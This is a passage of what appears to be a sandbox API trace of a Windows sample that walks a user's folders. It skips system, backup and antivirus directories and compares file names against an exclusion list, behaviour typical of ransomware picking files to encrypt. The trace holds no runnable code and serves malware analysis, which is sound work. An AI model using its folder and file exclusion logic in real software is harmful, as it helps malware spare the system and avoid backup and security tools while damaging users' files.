lpsz="\\TEMP\\", cchLength=0x6 | out: lpsz="\\TEMP\\") returned 0x6 [0099.660] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ja\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\JA\\") returned 0x4b [0099.660] CharUpperBuffW (in: lpsz="\\BOOT\\", cchLength=0x6 | out: lpsz="\\BOOT\\") returned 0x6 [0099.660] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ja\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\JA\\") returned 0x4b [0099.660] CharUpperBuffW (in: lpsz="\\MSOCACHE\\", cchLength=0xa | out: lpsz="\\MSOCACHE\\") returned 0xa [0099.660] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ja\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\JA\\") returned 0x4b [0099.660] CharUpperBuffW (in: lpsz="\\DEFAULT USER\\", cchLength=0xe | out: lpsz="\\DEFAULT USER\\") returned 0xe [0099.661] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ja\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\JA\\") returned 0x4b [0099.661] CharUpperBuffW (in: lpsz="\\ACRONIS\\", cchLength=0x9 | out: lpsz="\\ACRONIS\\") returned 0x9 [0099.661] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ja\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\JA\\") returned 0x4b [0099.661] CharUpperBuffW (in: lpsz="\\BACKUPCLIENT\\", cchLength=0xe | out: lpsz="\\BACKUPCLIENT\\") returned 0xe [0099.661] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ja\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\JA\\") returned 0x4b [0099.661] CharUpperBuffW (in: lpsz="\\BACKUP MANAGER\\", cchLength=0x10 | out: lpsz="\\BACKUP MANAGER\\") returned 0x10 [0099.661] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ja\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\JA\\") returned 0x4b [0099.661] CharUpperBuffW (in: lpsz="\\CARBONITE\\", cchLength=0xb | out: lpsz="\\CARBONITE\\") returned 0xb [0099.661] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ja\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\JA\\") returned 0x4b [0099.661] CharUpperBuffW (in: lpsz="\\INTERNET EXPLORER\\", cchLength=0x13 | out: lpsz="\\INTERNET EXPLORER\\") returned 0x13 [0099.661] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ja\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\JA\\") returned 0x4b [0099.661] CharUpperBuffW (in: lpsz="\\WINDOWSPOWERSHELL\\", cchLength=0x13 | out: lpsz="\\WINDOWSPOWERSHELL\\") returned 0x13 [0099.661] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ja\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\JA\\") returned 0x4b [0099.661] CharUpperBuffW (in: lpsz="\\WINDOWS DEFENDER\\", cchLength=0x12 | out: lpsz="\\WINDOWS DEFENDER\\") returned 0x12 [0099.661] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ja\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\JA\\") returned 0x4b [0099.661] CharUpperBuffW (in: lpsz="\\TOR BROWSER\\", cchLength=0xd | out: lpsz="\\TOR BROWSER\\") returned 0xd [0099.661] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ja\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\JA\\") returned 0x4b [0099.661] CharUpperBuffW (in: lpsz="\\DVD MAKER\\", cchLength=0xb | out: lpsz="\\DVD MAKER\\") returned 0xb [0099.661] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ja\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\JA\\") returned 0x4b [0099.661] CharUpperBuffW (in: lpsz="\\ASPNET_CLIENT\\", cchLength=0xf | out: lpsz="\\ASPNET_CLIENT\\") returned 0xf [0099.661] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ja\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\JA\\") returned 0x4b [0099.661] CharUpperBuffW (in: lpsz="\\REFERENCE ASSEMBLIES\\", cchLength=0x16 | out: lpsz="\\REFERENCE ASSEMBLIES\\") returned 0x16 [0099.662] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ja\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\JA\\") returned 0x4b [0099.662] CharUpperBuffW (in: lpsz="\\MICROSOFT OFFICE\\", cchLength=0x12 | out: lpsz="\\MICROSOFT OFFICE\\") returned 0x12 [0099.662] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ja\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\JA\\") returned 0x4b [0099.662] CharUpperBuffW (in: lpsz="\\WINDOWS SIDEBAR\\", cchLength=0x11 | out: lpsz="\\WINDOWS SIDEBAR\\") returned 0x11 [0099.662] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ja\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\JA\\") returned 0x4b [0099.662] CharUpperBuffW (in: lpsz="\\WINDOWS MEDIA PLAYER\\", cchLength=0x16 | out: lpsz="\\WINDOWS MEDIA PLAYER\\") returned 0x16 [0099.662] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ja\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\JA\\") returned 0x4b [0099.662] CharUpperBuffW (in: lpsz="\\MICROSOFT\\OFFICE\\", cchLength=0x12 | out: lpsz="\\MICROSOFT\\OFFICE\\") returned 0x12 [0099.662] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ja\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\JA\\") returned 0x4b [0099.662] CharUpperBuffW (in: lpsz="\\MICROSOFT ONEDRIVE\\", cchLength=0x14 | out: lpsz="\\MICROSOFT ONEDRIVE\\") returned 0x14 [0099.663] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ja\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\JA\\") returned 0x4b [0099.663] CharUpperBuffW (in: lpsz="\\GOOGLE\\DRIVE\\", cchLength=0xe | out: lpsz="\\GOOGLE\\DRIVE\\") returned 0xe [0099.663] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ja\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\JA\\") returned 0x4b [0099.663] CharUpperBuffW (in: lpsz="\\DROPBOX\\", cchLength=0x9 | out: lpsz="\\DROPBOX\\") returned 0x9 [0099.663] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ja\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\JA\\") returned 0x4b [0099.663] CharUpperBuffW (in: lpsz="\\MICROSOFT\\PROVISIONING\\", cchLength=0x18 | out: lpsz="\\MICROSOFT\\PROVISIONING\\") returned 0x18 [0099.663] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ja\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\JA\\") returned 0x4b [0099.663] CharUpperBuffW (in: lpsz="\\MICROSOFT SILVERLIGHT\\", cchLength=0x17 | out: lpsz="\\MICROSOFT SILVERLIGHT\\") returned 0x17 [0099.663] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ja\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\JA\\") returned 0x4b [0099.663] CharUpperBuffW (in: lpsz="\\PROGRAMDATA\\MICROSOFT\\", cchLength=0x17 | out: lpsz="\\PROGRAMDATA\\MICROSOFT\\") returned 0x17 [0099.663] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ja\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\JA\\") returned 0x4b [0099.663] CharUpperBuffW (in: lpsz="\\MICROSOFT\\CRYPTO\\", cchLength=0x12 | out: lpsz="\\MICROSOFT\\CRYPTO\\") returned 0x12 [0099.663] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ja\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\JA\\") returned 0x4b [0099.663] CharUpperBuffW (in: lpsz="\\WINDOWSAPPS\\", cchLength=0xd | out: lpsz="\\WINDOWSAPPS\\") returned 0xd [0099.663] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ja\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\JA\\") returned 0x4b [0099.663] CharUpperBuffW (in: lpsz="\\ACROBAT READER", cchLength=0xf | out: lpsz="\\ACROBAT READER") returned 0xf [0099.663] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ja\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\JA\\") returned 0x4b [0099.663] CharUpperBuffW (in: lpsz="\\NVIDIA", cchLength=0x7 | out: lpsz="\\NVIDIA") returned 0x7 [0099.663] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ja\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\JA\\") returned 0x4b [0099.664] CharUpperBuffW (in: lpsz="\\7-ZIP\\", cchLength=0x7 | out: lpsz="\\7-ZIP\\") returned 0x7 [0099.664] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ja\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\JA\\") returned 0x4b [0099.664] CharUpperBuffW (in: lpsz="\\WINRAR\\", cchLength=0x8 | out: lpsz="\\WINRAR\\") returned 0x8 [0099.665] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ja\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\JA\\") returned 0x4b [0099.665] CharUpperBuffW (in: lpsz="\\ESET", cchLength=0x5 | out: lpsz="\\ESET") returned 0x5 [0099.665] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ja\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\JA\\") returned 0x4b [0099.665] CharUpperBuffW (in: lpsz="\\AVAST", cchLength=0x6 | out: lpsz="\\AVAST") returned 0x6 [0099.665] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ja\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\JA\\") returned 0x4b [0099.665] CharUpperBuffW (in: lpsz="\\MALWAREBYTES", cchLength=0xd | out: lpsz="\\MALWAREBYTES") returned 0xd [0099.665] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ja\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\JA\\") returned 0x4b [0099.665] CharUpperBuffW (in: lpsz="\\SYMANTEC ENDPOINT", cchLength=0x12 | out: lpsz="\\SYMANTEC ENDPOINT") returned 0x12 [0099.665] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ja\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\JA\\") returned 0x4b [0099.665] CharUpperBuffW (in: lpsz="\\TREND MICRO", cchLength=0xc | out: lpsz="\\TREND MICRO") returned 0xc [0099.665] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ja\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\JA\\") returned 0x4b [0099.665] CharUpperBuffW (in: lpsz="\\BITDEFENDER", cchLength=0xc | out: lpsz="\\BITDEFENDER") returned 0xc [0099.665] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ja\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\JA\\") returned 0x4b [0099.665] CharUpperBuffW (in: lpsz="\\PANDA SECURITY", cchLength=0xf | out: lpsz="\\PANDA SECURITY") returned 0xf [0099.665] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ja\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\JA\\") returned 0x4b [0099.665] CharUpperBuffW (in: lpsz="\\MCAFEE", cchLength=0x7 | out: lpsz="\\MCAFEE") returned 0x7 [0099.665] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ja\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\JA\\") returned 0x4b [0099.665] CharUpperBuffW (in: lpsz="\\KASPERSKY LAB", cchLength=0xe | out: lpsz="\\KASPERSKY LAB") returned 0xe [0099.666] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ja\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\JA\\") returned 0x4b [0099.666] CharUpperBuffW (in: lpsz="\\KASPERSKYLAB", cchLength=0xd | out: lpsz="\\KASPERSKYLAB") returned 0xd [0099.666] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ja\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\JA\\") returned 0x4b [0099.667] CharUpperBuffW (in: lpsz="\\AVDEFENDER", cchLength=0xb | out: lpsz="\\AVDEFENDER") returned 0xb [0099.667] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ja\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\JA\\") returned 0x4b [0099.667] CharUpperBuffW (in: lpsz="\\SOPHOS", cchLength=0x7 | out: lpsz="\\SOPHOS") returned 0x7 [0099.667] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ja\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\JA\\") returned 0x4b [0099.667] CharUpperBuffW (in: lpsz="\\AVG", cchLength=0x4 | out: lpsz="\\AVG") returned 0x4 [0099.667] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ja\\", cchLength=0x4b | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\APPDATA\\LOCAL\\MICROSOFT\\ONEDRIVE\\17.3.5892.0626_1\\JA\\") returned 0x4b [0099.667] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\ja\\*.*", lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 0x2cf598 [0099.667] FindNextFileW (in: hFindFile=0x2cf598, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 1 [0099.667] FindNextFileW (in: hFindFile=0x2cf598, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 1 [0099.667] CharUpperBuffW (in: lpsz=".mui", cchLength=0x4 | out: lpsz=".MUI") returned 0x4 [0099.667] CharUpperBuffW (in: lpsz="FileSync.LocalizedResources.dll.mui", cchLength=0x23 | out: lpsz="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI") returned 0x23 [0099.667] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EMAN", cchCount1=4, lpString2="MUI", cchCount2=3) returned 1 [0099.667] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="MUI", cchCount2=3) returned 3 [0099.667] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="MUI", cchCount2=3) returned 3 [0099.667] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BMP", cchCount1=3, lpString2="MUI", cchCount2=3) returned 1 [0099.667] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="MUI", cchCount2=3) returned 3 [0099.668] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RDP", cchCount1=3, lpString2="MUI", cchCount2=3) returned 3 [0099.668] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="MUI", cchCount2=3) returned 3 [0099.668] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="MUI", cchCount2=3) returned 1 [0099.668] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="MUI", cchCount2=3) returned 1 [0099.668] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BLF", cchCount1=3, lpString2="MUI", cchCount2=3) returned 1 [0099.668] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RBS", cchCount1=3, lpString2="MUI", cchCount2=3) returned 3 [0099.668] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REGTRANS-MS", cchCount1=11, lpString2="MUI", cchCount2=3) returned 3 [0099.668] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SETTINGCONTENT-MS", cchCount1=17, lpString2="MUI", cchCount2=3) returned 3 [0099.668] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEARCH-MS", cchCount1=9, lpString2="MUI", cchCount2=3) returned 3 [0099.668] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="MUI", cchCount2=3) returned 1 [0099.668] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="MUI", cchCount2=3) returned 3 [0099.668] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG1", cchCount1=4, lpString2="MUI", cchCount2=3) returned 1 [0099.668] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG2", cchCount1=4, lpString2="MUI", cchCount2=3) returned 1 [0099.668] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT", cchCount1=10, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0099.668] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.POL", cchCount1=10, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0099.668] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG", cchCount1=14, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0099.668] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG1", cchCount1=15, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0099.668] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG2", cchCount1=15, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0099.668] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICONCACHE.DB", cchCount1=12, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0099.668] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="THUMBS.DB", cchCount1=9, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0099.668] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTSECT.BAK", cchCount1=12, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 1 [0099.669] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTMGR", cchCount1=7, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 1 [0099.669] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEFAULT.RDP", cchCount1=11, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 1 [0099.669] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PAGEFILE.SYS", cchCount1=12, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0099.669] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HIBERFIL.SYS", cchCount1=12, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0099.669] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SWAPFILE.SYS", cchCount1=12, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0099.669] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WORDPAD.EXE", cchCount1=11, lpString2="FILESYNC.LOCALIZEDRESOURCES.DLL.MUI", cchCount2=35) returned 3 [0099.669] FindNextFileW (in: hFindFile=0x2cf598, lpFindFileData=0x19e1c0 | out: lpFindFileData=0x19e1c0) returned 0 [0099.669] FindClose (in: hFindFile=0x2cf598 | out: hFindFile=0x2cf598) returned 1 [0099.669] FindNextFileW (in: hFindFile=0x2cf318, lpFindFileData=0x19e4b0 | out: lpFindFileData=0x19e4b0) returned 1 [0099.669] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\", cchLength=0x1e | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\DESKTOP\\") returned 0x1e [0099.669] CharUpperBuffW (in: 